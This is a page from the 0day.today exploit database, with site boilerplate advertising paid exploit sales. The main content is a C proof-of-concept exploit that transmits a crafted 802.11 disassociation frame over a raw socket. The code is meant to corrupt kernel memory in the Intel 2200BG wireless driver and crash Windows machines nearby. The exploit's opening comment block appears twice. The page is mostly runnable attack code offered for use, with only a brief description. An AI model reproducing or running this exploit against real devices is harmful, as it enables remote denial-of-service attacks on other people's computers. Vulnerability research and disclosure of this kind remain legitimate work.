0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption
[==================================================================
Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption
==================================================================
/*
Title: Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption
Description: The intel wireless mini-pci driver provided with Intel
/*
Title: Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption
Description: The intel wireless mini-pci driver provided with Intel
2200BG cards is vulnerable to a remote memory corruption flaw.
Malformed disassociation packets can be used to corrupt internal kernel
structures, causing a denial of service (BSOD)
This vulnerability was found at Intel 2200 driver version 9.0.3.9
(09/12/2005).
Driver files:
w29n51.sys 9ee38ffcb4cbe5bee6c305700ddc4725
w29mlres.dll 35afeccc4092b69f62d757c4707c74e9
w29NCPA.dll 980f58b157baedc23026dd9302406bdd
Author: Breno Silva Pinto ( Sekure.org ) / bsilva[at]sekure[dot]org)
Proof Of Concept:
*/
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <asm/types.h>
#include <linux/if.h>
#include <linux/if_packet.h>
#include <linux/if_ether.h>
#include <linux/if_arp.h>
#include <netinet/in.h>
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
// 28 bytes disassociation packet.
char d[] = { 0xa0, 0x00, // 0xa0 pacote Disassociate 0xa000 FC Normal
0x00, 0x00, // Duration ID
0x00, 0x12, 0xf0, 0x29, 0x77, 0x00, // DST addr
0xbb, 0xbb, 0xbb, 0xbb, 0xbb, 0xbb, // SRC addr
0x00, 0x0f, 0x66, 0x11, 0x7b, 0xd0, // BSS id
0x00, 0x00, // Frag. Number
0x01, 0x00, 0x00, 0x00 }; // 2 bytes - Reason code
int main() {
struct sockaddr_ll link;
struct ifreq iface;
int s;
char packet[sizeof(d)];
int len = 0;
if((s=socket(PF_INET, SOCK_DGRAM, 0))<0)
return 0;
bzero(&iface,sizeof(iface));
bzero(&link,sizeof(link));
bzero(packet,sizeof(d));
strcpy(iface.ifr_name,"ath0raw");
if(ioctl(s,SIOCGIFHWADDR, &iface)) {
return 0;
}
if(ioctl(s,SIOCGIFINDEX, &iface)) {
return -1;
}
if((s=socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL)))<0) {
return -1;
}
link.sll_family = AF_PACKET;
link.sll_ifindex = iface.ifr_ifindex;
if(bind(s,(struct sockaddr *) &link, sizeof(link))<0) {
return -1;
}
memcpy(packet,d,sizeof(d));
len = sendto(s,packet,sizeof(d), 0, NULL, 0);
usleep(5000);
printf("%d bytes enviados\n",len);
close(s);
return 0;
}
# 0day.today [2024-11-15] #